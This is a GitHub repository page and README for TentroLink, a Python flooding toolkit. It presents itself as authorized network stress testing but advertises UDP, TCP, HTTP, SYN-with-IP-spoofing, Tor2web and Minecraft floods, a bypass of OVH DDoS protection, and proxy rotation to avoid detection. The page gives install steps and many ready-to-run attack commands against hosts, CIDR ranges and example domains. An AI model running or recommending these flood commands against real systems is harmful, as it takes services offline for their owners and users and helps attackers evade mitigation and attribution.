Skip to content

awiones/TentroLink

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

44 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

TentroLink

TentroLink Logo

Network Testing

πŸ“‹ Overview

TentroLink is an advanced network testing toolkit designed for legitimate security testing and network resilience evaluation. It provides a comprehensive set of tools for assessing network infrastructure through various methodologies, helping security professionals identify and address potential vulnerabilities.

⚠️ Legal Disclaimer

IMPORTANT: TentroLink is designed and should be used ONLY for authorized network testing, security research, and educational purposes. Usage of this tool against targets without explicit permission is illegal and unethical. The developers of TentroLink assume no liability and are not responsible for any misuse or damage caused by this tool.

You are responsible for your actions. Use this tool responsibly and legally.

NOTE: This project might be not work 100% while trying to flood since the high tech security from the server/website

πŸ› οΈ Key Features

Feature Description
πŸ”Ή UDP Flooding DNS attack with payloads
πŸ”Ή TCP Flooding Connection handling with pool management
πŸ”Ή HTTP Flooding HTTP/HTTPS flooding with custom payloads
πŸ”Ή TOR2WEB Flooding Anonymous penetration testing
πŸ”Ή SYN Flooding TCP SYN packet flooding with IP spoofing
πŸ”Ή Minecraft Flooding Multi-protocol Minecraft server testing
πŸ”Ή Layer 7 OVH Bypass OVH-4 protection bypass with adaptive sizing (OVH-1,2,3 coming soon)

NOTE: Some features like SYN flooding require root/administrator privileges for full capabilities

πŸš€ Installation

Step-by-Step Installation

# Clone the repository
git clone https://github.com/awiones/TentroLink.git

# Navigate to the TentroLink directory
cd TentroLink

# Install required packages
pip install -r requirements.txt

# Verify installation
python main.py --version

πŸ’» Usage Guide

Basic Syntax

python main.py [attack_method] -t [targets] [options]

Available Testing Methods

Method Description Default Port
udp UDP flood operation 53
tcp TCP flood operation with connection pooling 80
syn SYN flood operation with IP spoofing support 80
http HTTP flood operation 80
minecraft Minecraft server testing module 25565
ovh Layer 7 OVH protection bypass 80

Common Options

Option Description Default
-t, --targets Target specification (IP, domain, CIDR) Required
-p, --ports Port specification (single, range, named) Method-specific
-d, --duration Duration in seconds 60
-T, --threads Number of threads Method-specific
-v, --verbose Enable verbose output False
--no-color Disable colored output False
--proxy Use proxies (file path or "auto") None
--proxy-threads Threads for proxy validation 10

Quick Examples

# Basic UDP test
python main.py udp -t 192.168.1.1 -p 53 -d 30

# TCP test with multiple ports
python main.py tcp -t 192.168.1.1 -p 80,443 -d 60 -T 10

# SYN flood test with high thread count
python main.py syn -t example.com -p 80 -T 100 -d 60

# Test with automatic proxy acquisition
python main.py udp -t 192.168.1.1 --proxy auto

πŸ“Š Advanced Usage

UDP Testing

# Basic UDP test with threads
python main.py udp -t 192.168.1.1 -p 53 -d 60 -T 5

TCP Testing

# Testing multiple ports with increased threads
python main.py tcp -t 192.168.1.1 -p 80,443 -d 60 -T 10

HTTP Testing

# Basic HTTP flood test
python main.py http -t example.com -p 80 --method GET -d 60 -T 10

# HTTP POST flood with increased threads
python main.py http -t example.com -p 80 --method POST -d 60 -T 20

# Custom path with HTTPS
python main.py http -t example.com -p 443 --method GET --path /api/v1/test

Additional options:

  • --method: HTTP method to use (GET/POST/HEAD, default: GET)
  • --path: Target URL path (default: /)

Minecraft Testing

# Minecraft server testing
python main.py minecraft -t mc.example.com -p 25565 -T 10 -d 60

OVH Bypass Testing

# OVH bypass with optimal configuration
python main.py ovh -t example.com -T 10 -d 60 --path /api/v1

Note: Currently, only OVH-4 protection bypass is supported. Support for OVH-1, OVH-2, and OVH-3 will be added in future updates.

Proxy Configuration

# Automatic proxy acquisition
python main.py udp -t 192.168.1.1 --proxy auto

# Using a proxy list file
python main.py udp -t 192.168.1.1 --proxy proxies.txt

# Adjusting proxy validation threads
python main.py udp -t 192.168.1.1 --proxy auto --proxy-threads 20

Network Range Testing

# Testing a CIDR range
python main.py udp -t 192.168.1.0/24 -p 80-100 -d 120

Multiple Targets

# Testing multiple specific targets
python main.py tcp -t 192.168.1.1,192.168.1.2 -p http,https -d 60 -T 20

SYN Testing

# Basic SYN flood test
python main.py syn -t example.com -p 80 -d 60 -T 50

# Multi-port SYN flooding
python main.py syn -t example.com -p 80,443 -T 100 -d 120

# Skip target validation
python main.py syn -t example.com -p 80 -T 100 -y

Note: The SYN flooding module is currently experiencing lower than expected BPS performance. This is being investigated for improvement in future updates.

πŸ“Έ Screenshots

Test Statistics

Example of network test statistics output

πŸŽ₯ Watch the Demo:

YouTube Video Thumbnail

πŸ” Technical Details

TentroLink employs multiple sophisticated mechanisms to test network resilience:

  • Dynamic payload generation for maximizing test effectiveness
  • Intelligent thread management to optimize resource utilization
  • Proxy rotation algorithms to prevent detection and blocking
  • Real-time performance metrics for comprehensive reporting

Architecture

TentroLink uses a modular architecture consisting of:

  1. Core Engine - Manages resources and coordinates testing operations
  2. Attack Modules - Specialized implementations for different testing methodologies
  3. Proxy Manager - Handles proxy acquisition, validation, and rotation
  4. Metrics Collector - Gathers and displays real-time performance data

🀝 Contributing

We welcome contributions from the security research community! Here's how you can help:

  1. Report bugs: Open an issue on our issues page
  2. Feature requests: Suggest new features or improvements
  3. Code contributions: Submit pull requests with enhancements or fixes
  4. Documentation: Help improve or translate documentation

Please read our Contributing Guidelines before submitting a pull request.

πŸ“œ License

This project is licensed under the MIT License - see the LICENSE file for details.

πŸ“š References


Remember: With great power comes great responsibility. Use TentroLink ethically and legally.

About

Network stress testing for authorized penetration testing.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages